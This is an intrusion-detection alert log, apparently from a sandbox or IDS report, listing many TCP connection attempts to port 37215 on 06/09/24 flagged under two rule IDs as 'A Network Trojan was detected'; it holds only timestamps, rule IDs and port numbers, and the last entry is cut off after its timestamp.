          Timestamp:06/09/24-16:33:13.718464
          SID:2835222
          Source Port:45890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028229
          SID:2829579
          Source Port:38392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930245
          SID:2835222
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125330
          SID:2835222
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.095960
          SID:2835222
          Source Port:44736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250546
          SID:2835222
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658815
          SID:2829579
          Source Port:60046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299825
          SID:2835222
          Source Port:41696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164004
          SID:2835222
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946331
          SID:2835222
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075695
          SID:2835222
          Source Port:53482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287398
          SID:2835222
          Source Port:50560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035076
          SID:2829579
          Source Port:53194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278939
          SID:2835222
          Source Port:55642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399541
          SID:2829579
          Source Port:40942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928365
          SID:2835222
          Source Port:57088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990380
          SID:2835222
          Source Port:42922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103868
          SID:2829579
          Source Port:39270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162374
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568242
          SID:2835222
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910689
          SID:2835222
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160429
          SID:2835222
          Source Port:55106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252930
          SID:2835222
          Source Port:33538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102565
          SID:2829579
          Source Port:36106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715018
          SID:2829579
          Source Port:55672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863739
          SID:2835222
          Source Port:40488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478867
          SID:2829579
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539491
          SID:2835222
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931555
          SID:2835222
          Source Port:55470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162644
          SID:2835222
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414966
          SID:2829579
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041422
          SID:2835222
          Source Port:34154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643772
          SID:2835222
          Source Port:32828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635023
          SID:2835222
          Source Port:36682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474725
          SID:2835222
          Source Port:49816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915752
          SID:2829579
          Source Port:59818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160909
          SID:2835222
          Source Port:48316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566254
          SID:2835222
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159436
          SID:2835222
          Source Port:43988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419286
          SID:2829579
          Source Port:53278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931361
          SID:2829579
          Source Port:43024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157258
          SID:2829579
          Source Port:41114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036641
          SID:2829579
          Source Port:60222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604245
          SID:2835222
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285924
          SID:2835222
          Source Port:56434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988030
          SID:2835222
          Source Port:36172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103515
          SID:2835222
          Source Port:53492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230433
          SID:2835222
          Source Port:50622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869890
          SID:2829579
          Source Port:51058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418214
          SID:2835222
          Source Port:50022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286886
          SID:2829579
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080172
          SID:2835222
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130600
          SID:2829579
          Source Port:44100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161970
          SID:2835222
          Source Port:41144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245906
          SID:2835222
          Source Port:34320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014822
          SID:2835222
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397026
          SID:2829579
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950082
          SID:2835222
          Source Port:39118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537940
          SID:2829579
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724104
          SID:2829579
          Source Port:53296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252461
          SID:2829579
          Source Port:37396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031977
          SID:2835222
          Source Port:50214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983319
          SID:2835222
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490266
          SID:2835222
          Source Port:35960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253289
          SID:2829579
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032755
          SID:2829579
          Source Port:37096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230648
          SID:2829579
          Source Port:45330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395956
          SID:2835222
          Source Port:37012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417531
          SID:2829579
          Source Port:42202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864364
          SID:2835222
          Source Port:38596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273734
          SID:2829579
          Source Port:33070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571283
          SID:2829579
          Source Port:49038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929813
          SID:2829579
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207782
          SID:2835222
          Source Port:49470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914961
          SID:2829579
          Source Port:43678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908862
          SID:2829579
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413491
          SID:2829579
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285093
          SID:2835222
          Source Port:58290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163463
          SID:2829579
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010651
          SID:2835222
          Source Port:37186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988492
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823375
          SID:2835222
          Source Port:56942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206280
          SID:2835222
          Source Port:32872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564316
          SID:2835222
          Source Port:41376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084824
          SID:2835222
          Source Port:43670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273573
          SID:2829579
          Source Port:51420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.608042
          SID:2829579
          Source Port:52116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870543
          SID:2829579
          Source Port:49274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272279
          SID:2835222
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540169
          SID:2835222
          Source Port:46946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632964
          SID:2829579
          Source Port:58948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169456
          SID:2829579
          Source Port:37736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642823
          SID:2835222
          Source Port:35374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103919
          SID:2835222
          Source Port:48220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286055
          SID:2829579
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945291
          SID:2835222
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168666
          SID:2829579
          Source Port:60074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469667
          SID:2829579
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131582
          SID:2829579
          Source Port:33000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472009
          SID:2829579
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039559
          SID:2835222
          Source Port:37950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278925
          SID:2835222
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166833
          SID:2835222
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993467
          SID:2829579
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030419
          SID:2829579
          Source Port:40430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227422
          SID:2829579
          Source Port:59558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947648
          SID:2829579
          Source Port:36232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.556788
          SID:2835222
          Source Port:35544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929684
          SID:2835222
          Source Port:32894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087058
          SID:2829579
          Source Port:50538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299050
          SID:2829579
          Source Port:42486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396403
          SID:2829579
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660281
          SID:2835222
          Source Port:44824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034009
          SID:2835222
          Source Port:47278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931804
          SID:2829579
          Source Port:46444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467149
          SID:2835222
          Source Port:35428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714366
          SID:2835222
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471846
          SID:2835222
          Source Port:46564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945502
          SID:2829579
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133936
          SID:2829579
          Source Port:59266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944937
          SID:2835222
          Source Port:34722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930332
          SID:2829579
          Source Port:46678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717848
          SID:2829579
          Source Port:46852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399444
          SID:2829579
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600314
          SID:2829579
          Source Port:37880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289074
          SID:2829579
          Source Port:56718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398683
          SID:2829579
          Source Port:51956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861309
          SID:2835222
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688205
          SID:2835222
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929603
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415156
          SID:2835222
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415453
          SID:2835222
          Source Port:43844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081714
          SID:2835222
          Source Port:59778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.043108
          SID:2835222
          Source Port:35650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292321
          SID:2835222
          Source Port:41302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720120
          SID:2829579
          Source Port:38894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163924
          SID:2829579
          Source Port:58788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032743
          SID:2829579
          Source Port:59896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163439
          SID:2829579
          Source Port:39732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247182
          SID:2835222
          Source Port:33838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946211
          SID:2829579
          Source Port:46240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987530
          SID:2835222
          Source Port:56214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539266
          SID:2835222
          Source Port:35272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230546
          SID:2835222
          Source Port:43906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604619
          SID:2829579
          Source Port:55728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862049
          SID:2829579
          Source Port:46888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076292
          SID:2835222
          Source Port:47564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563506
          SID:2835222
          Source Port:43908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567556
          SID:2835222
          Source Port:52762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031942
          SID:2829579
          Source Port:46662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564147
          SID:2835222
          Source Port:50284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299431
          SID:2829579
          Source Port:56818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.932501
          SID:2829579
          Source Port:51330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281154
          SID:2829579
          Source Port:37086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946911
          SID:2835222
          Source Port:51974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714296
          SID:2829579
          Source Port:44504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275583
          SID:2835222
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357456
          SID:2829579
          Source Port:48470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645351
          SID:2835222
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644717
          SID:2835222
          Source Port:54880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931578
          SID:2829579
          Source Port:44428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283712
          SID:2829579
          Source Port:47880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274649
          SID:2835222
          Source Port:35090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296771
          SID:2829579
          Source Port:52926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567415
          SID:2835222
          Source Port:48094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947831
          SID:2829579
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948876
          SID:2829579
          Source Port:47130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477459
          SID:2835222
          Source Port:54204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414282
          SID:2835222
          Source Port:36060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595959
          SID:2829579
          Source Port:48226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951606
          SID:2835222
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103444
          SID:2835222
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468732
          SID:2835222
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298250
          SID:2829579
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274881
          SID:2829579
          Source Port:55212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034345
          SID:2829579
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928988
          SID:2829579
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565146
          SID:2829579
          Source Port:54014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870574
          SID:2835222
          Source Port:34816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076311
          SID:2835222
          Source Port:33840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993480
          SID:2835222
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035140
          SID:2835222
          Source Port:50560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944163
          SID:2835222
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.951367
          SID:2829579
          Source Port:58046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222743
          SID:2835222
          Source Port:51088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946495
          SID:2829579
          Source Port:58860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160957
          SID:2829579
          Source Port:41768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928972
          SID:2835222
          Source Port:36538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568160
          SID:2835222
          Source Port:55818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289227
          SID:2835222
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926938
          SID:2829579
          Source Port:51784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694727
          SID:2829579
          Source Port:52976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032896
          SID:2835222
          Source Port:37634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597373
          SID:2835222
          Source Port:49594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558321
          SID:2835222
          Source Port:50256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206307
          SID:2829579
          Source Port:57804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.098649
          SID:2829579
          Source Port:38482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644598
